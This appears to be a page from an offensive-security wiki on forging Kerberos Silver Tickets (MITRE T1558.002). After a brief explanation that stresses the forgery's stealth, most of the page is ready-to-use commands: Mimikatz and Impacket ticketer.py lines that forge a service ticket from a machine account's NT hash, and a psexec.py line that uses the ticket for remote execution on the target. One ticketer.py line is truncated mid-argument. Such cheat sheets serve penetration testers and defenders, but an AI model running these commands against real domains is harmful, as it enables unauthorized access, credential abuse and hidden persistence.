search
Personal BlogTwitterGitHubContact

Forge Silver Ticket

MITRE ATT&CK, Credential Access, Technique T1558.002

A Silver Ticket is a forged TGS, signed using the secret keys of a machine account. This can be useful for short-term persistence and is considered stealthy. The large benefit of creating a silver ticket is that we can create it offline, meaning that it can be very hard for an organization to track when one is created.

hashtag
Mimikatz

Creation of a silver ticket utilizing Mimikatz:

kerberos::golden /user:Administrator /domain:$domain /sid:$domain_sid /target:$target_machine /service:cifs /rc4:$nthash /ticket:$output

hashtag
Ticketer.py

Creation of a silver ticket using Impacket:

ticketer.py -nthash $nthash -domain-sid $domain_sid -domain $domain -spn cifs/$target_machine $u
export KRB5CCNAME=$user.ccache

hashtag
Utilizing the Silver Ticket

Utilizing a silver ticket using Impacket: 

psexec.py $domain/$user@$target_machine -k -no-pass

hashtag
References

SPNsActive Directory & Azure AD/Entra ID Securitychevron-right
PreviousForge Golden TicketNextForge Trust Ticket

Last updated